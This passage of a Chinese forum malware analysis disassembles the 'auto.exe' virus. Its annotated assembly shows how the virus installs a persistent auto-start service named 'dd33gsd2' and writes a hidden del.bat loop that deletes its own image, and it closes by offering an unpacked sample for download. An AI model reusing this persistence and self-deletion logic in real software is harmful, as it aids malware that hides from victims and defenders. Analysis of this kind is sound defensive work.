00402BBD                                         ; Detection: an auto-start service whose image path is an
00402BBD                                         ; odd-looking basename in the system directory plus " -k"
00402BC3                 push    1               ; arg_14
00402BC5                 push    0BB8h           ; dwMilliseconds = 3000
00402BCA                 lea     eax, [ebp+var_41C]
00402BD0                 push    offset dword_410E1C ; arg_C: the bare <name>, handed to SetVirusServiceKeys with "Description"
00402BD5                 push    eax             ; lpBinaryPathName = var_41C
00402BD6                 mov     esi, offset aDd33gsd2_1 ; "dd33gsd2"
00402BDB                 push    offset aDd33gsd2_0 ; "dd33gsd2" -- lpDisplayName
00402BE0                 push    esi             ; lpServiceName = "dd33gsd2"
00402BE1                 call    RegisterVirusService ; create (or repoint) the auto-start service; see below

{
  00402F83 RegisterVirusService proc near
  00402F83
  00402F83 var_110         = dword ptr -110h
  00402F83 pcbBytesNeeded  = dword ptr -10h
  00402F83 var_C           = dword ptr -0Ch
  00402F83 hSCManager      = dword ptr -8
  00402F83 hSCObject       = dword ptr -4
  00402F83 lpServiceName   = dword ptr  8
  00402F83 lpDisplayName   = dword ptr  0Ch
  00402F83 lpBinaryPathName= dword ptr  10h
  00402F83 arg_C           = dword ptr  14h
  00402F83 dwMilliseconds  = dword ptr  18h
  00402F83 arg_14          = dword ptr  1Ch
  00402F83
  00402F83                 push    ebp
  00402F84                 mov     ebp, esp
  00402F86                 sub     esp, 110h
  00402F8C                 mov     al, ds:byte_410F20
  00402F91                 push    ebx
  00402F92                 push    esi
  00402F93                 push    edi
  00402F94                 push    3Fh
  00402F96                 mov     byte ptr [ebp+var_110], al
  00402F9C                 pop     ecx
  00402F9D                 xor     eax, eax
  00402F9F                 lea     edi, [ebp+var_110+1]
  00402FA5                 push    offset aSystemCurr ; "SYSTEM\\Curr"
  00402FAA                 rep stosd
  00402FAC                 stosw
  00402FAE                 lea     eax, [ebp+var_110]
  00402FB4                 push    eax
  00402FB5                 call    ds:lstrcpy
  00402FBB                 mov     esi, ds:lstrcat
  00402FC1                 lea     eax, [ebp+var_110]
  00402FC7                 push    offset aEntcontrolse ; "entControlSe"
  00402FCC                 push    eax
  00402FCD                 call    esi ; lstrcat
  00402FCF                 lea     eax, [ebp+var_110]
  00402FD5                 push    offset aTServices ; "t\\Services\\"
  00402FDA                 push    eax
  00402FDB                 call    esi ; lstrcat
  00402FDD                 push    [ebp+lpServiceName]
  00402FE0                 lea     eax, [ebp+var_110]
  00402FE6                 push    eax
  00402FE7                 call    esi ; lstrcat
  00402FE9                 xor     edi, edi
  00402FEB                 mov     ebx, 0F01FFh
  00402FF0                 mov     esi, offset aDescription ; "Description"
  00402FF5
  00402FF5 loc_402FF5:
  00402FF5                 push    0F003Fh         ; dwDesiredAccess
  00402FFA                 push    edi             ; lpDatabaseName
  00402FFB                 push    edi             ; lpMachineName
  00402FFC                 call    ds:OpenSCManagerA ; Establish a connection to the service
  00402FFC                                         ; control manager on the specified computer
  00402FFC                                         ; and opens the specified database
  00403002                 cmp     eax, edi
  00403004                 mov     [ebp+hSCManager], eax
  00403007                 jz      loc_4030B9
  0040300D                 push    ebx             ; dwDesiredAccess
  0040300E                 push    [ebp+lpServiceName] ; lpServiceName
  00403011                 push    eax             ; hSCManager
  00403012                 call    ds:OpenServiceA
  00403018                 cmp     eax, edi
  0040301A                 mov     [ebp+hSCObject], eax
  0040301D                 jz      short loc_403088
  0040301F                 push    400h            ; uBytes
  00403024                 push    40h             ; uFlags
  00403026                 call    ds:LocalAlloc
  0040302C                 cmp     eax, edi
  0040302E                 mov     [ebp+var_C], eax
  00403031                 jz      short loc_403088
  00403033                 lea     ecx, [ebp+pcbBytesNeeded]
  00403036                 push    ecx             ; pcbBytesNeeded
  00403037                 push    400h            ; cbBufSize
  0040303C                 push    eax             ; lpServiceConfig
  0040303D                 push    [ebp+hSCObject] ; hService
  00403040                 call    ds:QueryServiceConfigA
  00403046                 test    eax, eax
  00403048                 jz      short loc_403088
  0040304A                 mov     eax, [ebp+var_C]
  0040304D                 cmp     dword ptr [eax+4], 2
  00403051                 jnz     short loc_40305B
  00403053                 mov     eax, [eax+0Ch]
  00403056                 cmp     eax, [ebp+lpBinaryPathName]
  00403059                 jz      short loc_403088
  0040305B
  0040305B loc_40305B:
  0040305B                 push    [ebp+lpDisplayName] ; lpDisplayName
  0040305E                 push    edi             ; lpPassword
  0040305F                 push    edi             ; lpServiceStartName
  00403060                 push    edi             ; lpDependencies
  00403061                 push    edi             ; lpdwTagId
  00403062                 push    edi             ; lpLoadOrderGroup
  00403063                 push    [ebp+lpBinaryPathName] ; lpBinaryPathName
  00403066                 push    0FFFFFFFFh      ; dwErrorControl
  00403068                 push    2               ; dwStartType
  0040306A                 push    10h             ; dwServiceType
  0040306C                 push    [ebp+hSCObject] ; hService
  0040306F                 call    ds:ChangeServiceConfigA
  00403075                 push    [ebp+arg_C]
  00403078                 lea     eax, [ebp+var_110]
  0040307E                 push    esi
  0040307F                 push    eax
  00403080                 call    SetVirusServiceKeys
  00403085                 add     esp, 0Ch
  00403088
  00403088 loc_403088:
  00403088                 push    edi             ; lpPassword
  00403089                 push    edi             ; lpServiceStartName
  0040308A                 push    edi             ; lpDependencies
  0040308B                 push    edi             ; lpdwTagId
  0040308C                 push    edi             ; lpLoadOrderGroup
  0040308D                 push    [ebp+lpBinaryPathName] ; lpBinaryPathName
  00403090                 push    1               ; dwErrorControl
  00403092                 push    2               ; dwStartType
  00403094                 push    10h             ; dwServiceType
  00403096                 push    ebx             ; dwDesiredAccess
  00403097                 push    [ebp+lpDisplayName] ; lpDisplayName
  0040309A                 push    [ebp+lpServiceName] ; lpServiceName
  0040309D                 push    [ebp+hSCManager] ; hSCManager
  004030A0                 call    ds:CreateServiceA
  004030A6                 push    [ebp+arg_C]
  004030A9                 lea     eax, [ebp+var_110]
  004030AF                 push    esi
  004030B0                 push    eax
  004030B1                 call    SetVirusServiceKeys
  004030B6                 add     esp, 0Ch
  004030B9
  004030B9 loc_4030B9:
  004030B9                 push    [ebp+hSCObject] ; hSCObject
  004030BC                 call    ds:CloseServiceHandle
  004030C2                 push    1               ; dwMilliseconds
  004030C4                 call    ds:Sleep
  004030CA                 push    [ebp+lpServiceName]
  004030CD                 lea     eax, [ebp+var_110]
  004030D3                 push    offset aDisplayname ; "DisplayName"
  004030D8                 push    eax
  004030D9                 call    SetVirusServiceKeys
  004030DE                 push    [ebp+arg_C]
  004030E1                 lea     eax, [ebp+var_110]
  004030E7                 push    esi
  004030E8                 push    eax
  004030E9                 call    SetVirusServiceKeys
  004030EE                 push    1
  004030F0                 lea     eax, [ebp+var_110]
  004030F6                 push    offset aErrorcontrol ; "ErrorControl"
  004030FB                 push    eax
  004030FC                 call    sub_402DC6
  00403101                 push    [ebp+lpBinaryPathName]
  00403104                 lea     eax, [ebp+var_110]
  0040310A                 push    offset aImagepath ; "ImagePath"
  0040310F                 push    eax
  00403110                 call    SetVirusServiceKeys
  00403115                 push    offset aLocalsystem ; "LocalSystem"
  0040311A                 lea     eax, [ebp+var_110]
  00403120                 push    offset aObjectname ; "ObjectName"
  00403125                 push    eax
  00403126                 call    SetVirusServiceKeys
  0040312B                 push    2
  0040312D                 lea     eax, [ebp+var_110]
  00403133                 push    offset aStart   ; "Start"
  00403138                 push    eax
  00403139                 call    sub_402DC6
  0040313E                 add     esp, 48h
  00403141                 lea     eax, [ebp+var_110]
  00403147                 push    10h
  00403149                 push    offset aType    ; "Type"
  0040314E                 push    eax
  0040314F                 call    sub_402DC6
  00403154                 add     esp, 0Ch
  00403157                 push    1
  00403159                 pop     eax
  0040315A                 cmp     [ebp+arg_14], eax
  0040315D                 jz      short loc_40316D
  0040315F                 push    [ebp+dwMilliseconds] ; dwMilliseconds
  00403162                 call    ds:Sleep
  00403168                 jmp     loc_402FF5
  0040316D ; ----------------------------------------------------------------------------
  0040316D
  0040316D loc_40316D:
  0040316D                 pop     edi
  0040316E                 pop     esi
  0040316F                 pop     ebx
  00403170                 leave
  00403171                 retn
  00403171 RegisterVirusService endp
}

00402BE6                 push    esi
00402BE7                 call    StartVirusService ; 启动病毒服务
{
  ;-----------------------------------------------------------------------
  ; StartVirusService(lpServiceName)
  ; Opens the local SCM, opens the named service and asks SCM to start it.
  ; In:    lpServiceName = first stack argument (ANSI service name); no
  ;        ret-imm, the caller adjusts esp after the call
  ; Out:   eax = result of whichever API call ran last (0 when OpenSCManagerA
  ;        or OpenServiceA fails); StartServiceA's own result is discarded,
  ;        so the caller cannot tell whether the service actually started
  ; Clobb: eax, ecx, edx, flags; esi/edi are saved and restored
  ; NOTE(review): when OpenServiceA fails, the jz at 00402F67 skips both
  ;        CloseServiceHandle calls, so the SCM handle held in edi is leaked.
  ;-----------------------------------------------------------------------
  00402F3C StartVirusService proc near
  00402F3C
  00402F3C lpServiceName   = dword ptr  0Ch
  00402F3C
  00402F3C                 push    esi
  00402F3D                 push    edi
  00402F3E                 push    0F003Fh         ; dwDesiredAccess = SC_MANAGER_ALL_ACCESS
  00402F43                 push    0               ; lpDatabaseName (default: SERVICES_ACTIVE_DATABASE)
  00402F45                 push    0               ; lpMachineName (local machine)
  00402F47                 call    ds:OpenSCManagerA ; Establish a connection to the service
  00402F47                                         ; control manager on the specified computer
  00402F47                                         ; and opens the specified database
  00402F4D                 mov     edi, eax        ; edi = hSCManager
  00402F4F                 test    edi, edi
  00402F51                 jz      short loc_402F80 ; SCM not reachable (e.g. missing rights): give up silently
  00402F53                 push    0F01FFh         ; dwDesiredAccess = SERVICE_ALL_ACCESS
  00402F58                 push    [esp+4+lpServiceName] ; lpServiceName (offset accounts for the three pushes above)
  00402F5C                 push    edi             ; hSCManager
  00402F5D                 call    ds:OpenServiceA
  00402F63                 mov     esi, eax        ; esi = hService
  00402F65                 test    esi, esi
  00402F67                 jz      short loc_402F80 ; service missing: bail out, hSCManager in edi is NOT closed
  00402F69                 push    0               ; lpServiceArgVectors
  00402F6B                 push    0               ; dwNumServiceArgs
  00402F6D                 push    esi             ; hService
  00402F6E                 call    ds:StartServiceA ; return value is never examined
  00402F74                 push    esi             ; hSCObject
  00402F75                 mov     esi, ds:CloseServiceHandle
  00402F7B                 call    esi ; CloseServiceHandle -- close hService
  00402F7D                 push    edi             ; hSCObject
  00402F7E                 call    esi ; CloseServiceHandle -- close hSCManager
  00402F80
  00402F80 loc_402F80:
  00402F80
  00402F80                 pop     edi
  00402F81                 pop     esi
  00402F82                 retn
  00402F82 StartVirusService endp
}
00402BEC                 add     esp, 1Ch

【第七宗罪】 毁尸灭迹

    不要以为 auto.exe 是个头脑简单的家伙,它干了坏事以后也是要消灭罪证的。想知道如何删除正在运行的程序文件吗?仔细看看下面的代码:

00402BEF                 cmp     [ebp+var_SysInfectFlag], 0
00402BF3                 jnz     short loc_402BFA
00402BF5                 call    Del_InfectingHost ; 如果当前运行病毒实例不是系统目录下的实例
00402BF5                                         ; 则在运行完毕以后删除该实例
{
  ;-----------------------------------------------------------------------
  ; int Del_InfectingHost(void)
  ; Decides whether this running instance is the "outside" copy and, if so,
  ; writes "<system dir>\del.bat" and launches it hidden so that the batch
  ; file removes this image after the process has exited.
  ; Strings built below (all visible concatenations):
  ;   var_szFilename   = full path of the running module (GetModuleFileNameA)
  ;   var_szSysDirName = "<system dir>\dd33gsd2.exe"
  ;   var_szDelCmdLine = "<system dir>\del.bat"
  ; Out:   eax = -1 when GetSystemDirectoryA fails; otherwise 1 (via edi),
  ;        both when the image already is the system-directory copy (nothing
  ;        written) and after the batch file has been written and launched.
  ; Clobb: eax, ecx, edx, flags; ebx/esi/edi are saved on entry and
  ;        restored at 00401838.
  ; NOTE(review): ebx is passed as hModule at 00401583 and edi is loaded
  ;        with byte_410F20 at 004012EE; both are prepared in the part of
  ;        the function the author elided (……). No WriteFile result is
  ;        checked, and on the CreateFileA failure path CloseHandle and
  ;        WinExec still run with an invalid handle and whatever file may
  ;        already exist at that path.
  ; NOTE(review): the strcat/lstrcat calls between 004015B4 and 004015EF
  ;        are unbounded appends into 256-byte buffers; with a system
  ;        directory path close to the 0FEh limit they could run into the
  ;        neighbouring buffer -- academic for real paths, but worth knowing
  ;        when reading this frame.
  ; Forensic note: "<system dir>\del.bat" is the on-disk artifact this
  ;        routine leaves behind; its fixed name and location are visible
  ;        here, as is the "dd33gsd2.exe" name of the system-directory copy.
  ;-----------------------------------------------------------------------
  004012E2 Del_InfectingHost proc near
  004012E2
  004012E2 var_szDelCmdLine= byte ptr -408h      ; 256 B: "<sysdir>\del.bat"
  004012E2 var_szFilename  = byte ptr -308h      ; 256 B: path of this module
  004012E2 var_szSysDirName= byte ptr -208h      ; 256 B: "<sysdir>\dd33gsd2.exe"
  004012E2 Buffer          = dword ptr -108h     ; 256 B: one batch-file fragment at a time
  004012E2 hObject         = dword ptr -8        ; handle of del.bat
  004012E2 NumberOfBytesWritten= dword ptr -4    ; WriteFile out-param (value never checked)
  004012E2
  004012E2                 push    ebp
  004012E3                 mov     ebp, esp
  004012E5                 sub     esp, 408h       ; four 256-byte buffers + two dwords
  004012EB                 push    ebx
  004012EC                 push    esi
  004012ED                 push    edi             ; callee-saved regs, restored at 00401838
  004012EE                 mov     edi, offset byte_410F20
  …………………………
  …………………………
  ; (elided by the author; by 00401583 ebx is expected to hold hModule)
  00401577                 lea     eax, [ebp+var_szFilename]
  0040157D                 push    0FFh            ; nSize
  00401582                 push    eax             ; lpFilename
  00401583                 push    ebx             ; hModule
  00401584                 call    ds:GetModuleFileNameA ; var_szFilename = full path of this image
  0040158A                 lea     eax, [ebp+var_szSysDirName]
  00401590                 push    0FEh            ; uSize
  00401595                 push    eax             ; lpBuffer
  00401596                 call    ds:GetSystemDirectoryA ; var_szSysDirName = "<sysdir>" (no trailing '\')
  0040159C                 test    eax, eax
  0040159E                 jnz     short loc_4015A8
  004015A0                 or      eax, 0FFFFFFFFh ; GetSystemDirectoryA failed: return -1
  004015A3                 jmp     loc_401838
  004015A8 ; ----------------------------------------------------------------------------
  004015A8
  004015A8 loc_4015A8:
  004015A8                 lea     eax, [ebp+var_szSysDirName]
  004015AE                 push    offset asc_410B74 ; "\\"
  004015B3                 push    eax
  004015B4                 call    strcat          ; var_szSysDirName = "<sysdir>\"
  004015B9                 mov     ebx, ds:lstrcpy ; ebx = lstrcpy for the rest of the routine
  004015BF                 pop     ecx             ; cdecl: drop strcat's two arguments
  004015C0                 pop     ecx
  004015C1                 lea     eax, [ebp+var_szSysDirName]
  004015C7                 push    eax
  004015C8                 lea     eax, [ebp+var_szDelCmdLine]
  004015CE                 push    eax
  004015CF                 call    ebx ; lstrcpy -- var_szDelCmdLine = "<sysdir>\"
  004015D1                 lea     eax, [ebp+var_szDelCmdLine]
  004015D7                 push    offset aDel_bat ; "del.bat"
  004015DC                 push    eax
  004015DD                 call    ds:lstrcat      ; var_szDelCmdLine = "<sysdir>\del.bat"
  004015E3                 lea     eax, [ebp+var_szSysDirName]
  004015E9                 push    offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
  004015EE                 push    eax
  004015EF                 call    strcat          ; var_szSysDirName = "<sysdir>\dd33gsd2.exe"
  004015F4                 mov     esi, ds:CharUpperA
  004015FA                 pop     ecx
  004015FB                 pop     ecx
  004015FC                 lea     eax, [ebp+var_szSysDirName]
  00401602                 push    eax             ; lpsz
  00401603                 call    esi ; CharUpperA -- upper-cases in place, returns the same pointer
  00401605                 push    eax             ; lpString2 = upper-cased "<sysdir>\dd33gsd2.exe"
  00401606                 lea     eax, [ebp+var_szFilename]
  0040160C                 push    eax             ; lpsz
  0040160D                 call    esi ; CharUpperA
  0040160F                 push    eax             ; lpString1 = upper-cased path of this image
  00401610                 call    ds:lstrcmp      ; is this image the system-directory copy?
  00401616                 push    1
  00401618                 test    eax, eax
  0040161A                 pop     edi             ; edi = 1: both the return value and the Sleep period (1 ms)
  0040161B                 jz      loc_401836      ; paths match: already the system copy, skip the self-removal
  00401621                 mov     esi, ds:Sleep
  00401627                 push    edi             ; dwMilliseconds
  00401628                 call    esi ; Sleep -- 4 x Sleep(1 ms); edi is 1 here
  0040162A                 push    edi             ; dwMilliseconds
  0040162B                 call    esi ; Sleep
  0040162D                 push    edi             ; dwMilliseconds
  0040162E                 call    esi ; Sleep
  00401630                 push    edi             ; dwMilliseconds
  00401631                 call    esi ; Sleep
  00401633                 xor     eax, eax
  00401635                 push    eax             ; hTemplateFile
  00401636                 push    eax             ; dwFlagsAndAttributes
  00401637                 push    2               ; dwCreationDisposition = CREATE_ALWAYS
  00401639                 push    eax             ; lpSecurityAttributes
  0040163A                 push    eax             ; dwShareMode (exclusive)
  0040163B                 lea     eax, [ebp+var_szDelCmdLine]
  00401641                 push    40000000h       ; dwDesiredAccess = GENERIC_WRITE
  00401646                 push    eax             ; lpFileName
  00401647                 call    ds:CreateFileA  ; create/truncate "<sysdir>\del.bat"
  0040164D                 cmp     eax, 0FFFFFFFFh ; INVALID_HANDLE_VALUE?
  00401650                 mov     [ebp+hObject], eax
  00401653                 jz      loc_40181E      ; creation failed: skip writing, but still "close" and WinExec below
  00401659                 lea     eax, [ebp+Buffer]
  0040165F                 push    offset a@echoOff ; "@echo off\r\n"
  00401664                 push    eax             ; suppress command echo so nothing shows on screen
  00401665                 call    strcpy          ; Buffer = "@echo off\r\n"
  0040166A                 pop     ecx
  0040166B                 pop     ecx
  ; Every batch fragment below follows the same shape: copy the text into
  ; Buffer, then WriteFile(hObject, Buffer, lstrlen(Buffer),
  ; &NumberOfBytesWritten, NULL). None of the WriteFile results is checked.
  0040166C                 push    edi             ; dwMilliseconds
  0040166D                 call    esi ; Sleep -- 12 x Sleep(1 ms)
  0040166F                 push    edi             ; dwMilliseconds
  00401670                 call    esi ; Sleep
  00401672                 push    edi             ; dwMilliseconds
  00401673                 call    esi ; Sleep
  00401675                 push    edi             ; dwMilliseconds
  00401676                 call    esi ; Sleep
  00401678                 push    edi             ; dwMilliseconds
  00401679                 call    esi ; Sleep
  0040167B                 push    edi             ; dwMilliseconds
  0040167C                 call    esi ; Sleep
  0040167E                 push    edi             ; dwMilliseconds
  0040167F                 call    esi ; Sleep
  00401681                 push    edi             ; dwMilliseconds
  00401682                 call    esi ; Sleep
  00401684                 push    edi             ; dwMilliseconds
  00401685                 call    esi ; Sleep
  00401687                 push    edi             ; dwMilliseconds
  00401688                 call    esi ; Sleep
  0040168A                 push    edi             ; dwMilliseconds
  0040168B                 call    esi ; Sleep
  0040168D                 push    edi             ; dwMilliseconds
  0040168E                 call    esi ; Sleep
  00401690                 mov     esi, ds:lstrlen ; esi = lstrlen from here on
  00401696                 lea     eax, [ebp+NumberOfBytesWritten]
  00401699                 push    0               ; lpOverlapped
  0040169B                 push    eax             ; lpNumberOfBytesWritten
  0040169C                 lea     eax, [ebp+Buffer]
  004016A2                 push    eax
  004016A3                 call    esi ; lstrlen
  004016A5                 mov     edi, ds:WriteFile ; edi = WriteFile (the 1 is put back into edi at 0040181B)
  004016AB                 push    eax             ; nNumberOfBytesToWrite
  004016AC                 lea     eax, [ebp+Buffer]
  004016B2                 push    eax             ; lpBuffer
  004016B3                 push    [ebp+hObject]   ; hFile
  004016B6                 call    edi ; WriteFile -- batch line 1: "@echo off"
  004016B8                 lea     eax, [ebp+Buffer]
  004016BE                 push    offset aSelfkill ; ":selfkill\r\n"
  004016C3                 push    eax
  004016C4                 call    strcpy          ; batch line 2: the label the retry loop jumps back to
  004016C9                 pop     ecx
  004016CA                 lea     eax, [ebp+NumberOfBytesWritten]
  004016CD                 pop     ecx
  004016CE                 push    0               ; lpOverlapped
  004016D0                 push    eax             ; lpNumberOfBytesWritten
  004016D1                 lea     eax, [ebp+Buffer]
  004016D7                 push    eax
  004016D8                 call    esi ; lstrlen
  004016DA                 push    eax             ; nNumberOfBytesToWrite
  004016DB                 lea     eax, [ebp+Buffer]
  004016E1                 push    eax             ; lpBuffer
  004016E2                 push    [ebp+hObject]   ; hFile
  004016E5                 call    edi ; WriteFile -- ":selfkill"
  004016E7                 lea     eax, [ebp+Buffer]
  004016ED                 push    offset aDelFQ   ; "del /F /Q \""
  004016F2                 push    eax             ; delete its own image once the work is done
  004016F3                 call    strcpy          ; batch line 3, written in three pieces: del /F /Q "<own path>"
  004016F8                 pop     ecx
  004016F9                 lea     eax, [ebp+NumberOfBytesWritten]
  004016FC                 pop     ecx
  004016FD                 push    0               ; lpOverlapped
  004016FF                 push    eax             ; lpNumberOfBytesWritten
  00401700                 lea     eax, [ebp+Buffer]
  00401706                 push    eax
  00401707                 call    esi ; lstrlen
  00401709                 push    eax             ; nNumberOfBytesToWrite
  0040170A                 lea     eax, [ebp+Buffer]
  00401710                 push    eax             ; lpBuffer
  00401711                 push    [ebp+hObject]   ; hFile
  00401714                 call    edi ; WriteFile -- piece 1: del /F /Q "
  00401716                 lea     eax, [ebp+var_szFilename] ; path of the running virus image
  0040171C                 push    eax
  0040171D                 lea     eax, [ebp+Buffer]
  00401723                 push    eax
  00401724                 call    strcpy          ; Buffer = own path (note: the original, not upper-cased, buffer was upper-cased in place at 0040160D)
  00401729                 pop     ecx
  0040172A                 lea     eax, [ebp+NumberOfBytesWritten]
  0040172D                 pop     ecx
  0040172E                 push    0               ; lpOverlapped
  00401730                 push    eax             ; lpNumberOfBytesWritten
  00401731                 lea     eax, [ebp+Buffer]
  00401737                 push    eax
  00401738                 call    esi ; lstrlen
  0040173A                 push    eax             ; nNumberOfBytesToWrite
  0040173B                 lea     eax, [ebp+Buffer]
  00401741                 push    eax             ; lpBuffer
  00401742                 push    [ebp+hObject]   ; hFile
  00401745                 call    edi ; WriteFile -- piece 2: <own path>
  00401747                 lea     eax, [ebp+Buffer]
  0040174D                 push    offset asc_410B44 ; "\"\r\n"
  00401752                 push    eax
  00401753                 call    ebx ; lstrcpy -- piece 3: closing quote + newline
  00401755                 lea     eax, [ebp+NumberOfBytesWritten]
  00401758                 push    0               ; lpOverlapped
  0040175A                 push    eax             ; lpNumberOfBytesWritten
  0040175B                 lea     eax, [ebp+Buffer]
  00401761                 push    eax
  00401762                 call    esi ; lstrlen
  00401764                 push    eax             ; nNumberOfBytesToWrite
  00401765                 lea     eax, [ebp+Buffer]
  0040176B                 push    eax             ; lpBuffer
  0040176C                 push    [ebp+hObject]   ; hFile
  0040176F                 call    edi ; WriteFile
  00401771                 lea     eax, [ebp+Buffer]
  00401777                 push    offset aIfExist ; "if exist \""
  0040177C                 push    eax
  0040177D                 call    ebx ; lstrcpy -- batch line 4, three pieces: if exist "<own path>" goto selfkill
  0040177F                 lea     eax, [ebp+NumberOfBytesWritten]
  00401782                 push    0               ; lpOverlapped
  00401784                 push    eax             ; lpNumberOfBytesWritten
  00401785                 lea     eax, [ebp+Buffer]
  0040178B                 push    eax
  0040178C                 call    esi ; lstrlen
  0040178E                 push    eax             ; nNumberOfBytesToWrite
  0040178F                 lea     eax, [ebp+Buffer]
  00401795                 push    eax             ; lpBuffer
  00401796                 push    [ebp+hObject]   ; hFile
  00401799                 call    edi ; WriteFile -- piece 1: if exist "
  0040179B                 lea     eax, [ebp+var_szFilename] ; path of the running virus image
  004017A1                 push    eax
  004017A2                 lea     eax, [ebp+Buffer]
  004017A8                 push    eax
  004017A9                 call    ebx ; lstrcpy
  004017AB                 lea     eax, [ebp+NumberOfBytesWritten]
  004017AE                 push    0               ; lpOverlapped
  004017B0                 push    eax             ; lpNumberOfBytesWritten
  004017B1                 lea     eax, [ebp+Buffer]
  004017B7                 push    eax
  004017B8                 call    esi ; lstrlen
  004017BA                 push    eax             ; nNumberOfBytesToWrite
  004017BB                 lea     eax, [ebp+Buffer]
  004017C1                 push    eax             ; lpBuffer
  004017C2                 push    [ebp+hObject]   ; hFile
  004017C5                 call    edi ; WriteFile -- piece 2: <own path>
  004017C7                 lea     eax, [ebp+Buffer]
  004017CD                 push    offset aGotoSelfkill ; "\" goto selfkill\r\n"
  004017D2                 push    eax
  004017D3                 call    ebx ; lstrcpy -- piece 3: the loop keeps retrying until the image is gone
  004017D5                 lea     eax, [ebp+NumberOfBytesWritten]
  004017D8                 push    0               ; lpOverlapped
  004017DA                 push    eax             ; lpNumberOfBytesWritten
  004017DB                 lea     eax, [ebp+Buffer]
  004017E1                 push    eax
  004017E2                 call    esi ; lstrlen
  004017E4                 push    eax             ; nNumberOfBytesToWrite
  004017E5                 lea     eax, [ebp+Buffer]
  004017EB                 push    eax             ; lpBuffer
  004017EC                 push    [ebp+hObject]   ; hFile
  004017EF                 call    edi ; WriteFile
  004017F1                 lea     eax, [ebp+Buffer]
  004017F7                 push    offset dword_410B18 ; final batch line; its text is not shown on this page -- verify in the sample
  004017FC                 push    eax
  004017FD                 call    ebx ; lstrcpy
  004017FF                 push    0               ; lpOverlapped
  00401801                 lea     eax, [ebp+NumberOfBytesWritten]
  00401804                 push    eax             ; lpNumberOfBytesWritten
  00401805                 lea     eax, [ebp+Buffer]
  0040180B                 push    eax
  0040180C                 call    esi ; lstrlen
  0040180E                 push    eax             ; nNumberOfBytesToWrite
  0040180F                 lea     eax, [ebp+Buffer]
  00401815                 push    eax             ; lpBuffer
  00401816                 push    [ebp+hObject]   ; hFile
  00401819                 call    edi ; WriteFile -- last line
  0040181B                 push    1
  0040181D                 pop     edi             ; edi = 1 again (return value)
  0040181E
  0040181E loc_40181E:
  0040181E                 push    [ebp+hObject]   ; hObject (INVALID_HANDLE_VALUE on the CreateFileA failure path)
  00401821                 call    ds:CloseHandle
  00401827                 lea     eax, [ebp+var_szDelCmdLine]
  0040182D                 push    SW_HIDE         ; uCmdShow
  0040182F                 push    eax             ; lpCmdLine = "<sysdir>\del.bat"
  00401830                 call    ds:WinExec      ; run del.bat hidden; it loops until this image can be deleted
  00401836
  00401836 loc_401836:
  00401836                 mov     eax, edi        ; return 1
  00401838
  00401838 loc_401838:
  00401838                 pop     edi
  00401839                 pop     esi
  0040183A                 pop     ebx
  0040183B                 leave
  0040183C                 retn
  0040183C Del_InfectingHost endp
}
00402BFA

【总结】

    判处 auto.exe 病毒死刑,剥夺政治权利终身,此审为终审判决,不得上诉。

加个脱了壳的尸体:

上传的附件 Unpacked_auto.rar
解压密码:PEDIY